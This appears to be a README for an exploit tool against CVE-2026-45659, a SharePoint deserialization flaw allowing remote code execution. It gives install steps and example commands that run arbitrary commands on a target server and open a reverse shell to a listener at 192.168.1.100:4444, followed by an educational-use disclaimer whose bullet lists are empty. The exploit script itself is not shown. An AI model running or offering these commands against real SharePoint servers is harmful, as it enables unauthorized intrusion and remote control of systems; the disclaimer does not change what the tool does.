
CVE-2026-45659
Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.
Use this project only in safe and authorized environments such as:
Example setup:
git clone <repository-url>
cd <repository-name>
Example usage:
# Install dependencies
pip install -r requirements.txt
# Basic command execution
python cve-2026-45659.py -t http://sp.lab.local -u lab\\testuser -p Password123 -l "Documents" -c "whoami /all"
# Reverse shell
python cve-2026-45659.py -t http://sp.lab.local -u lab\\testuser -p Password123 -l "Documents" --reverse --ip 192.168.1.100 --port 4444
A repository for learning, testing, and researching cybersecurity concepts in controlled environments.
This repository is for educational and authorized security research only.
It is designed to help users learn about:
Use this repository only in environments where you have permission, such as:
Unauthorized or illegal use is strictly prohibited.
The author and contributors are not responsible for any damage, misuse, legal issues, or losses caused by this project.
By using this repository, you agree that:
This project is intended for:
Please follow responsible disclosure practices and comply with all applicable laws.
For responsible disclosure or collaboration, contact the repository maintainer through GitHub.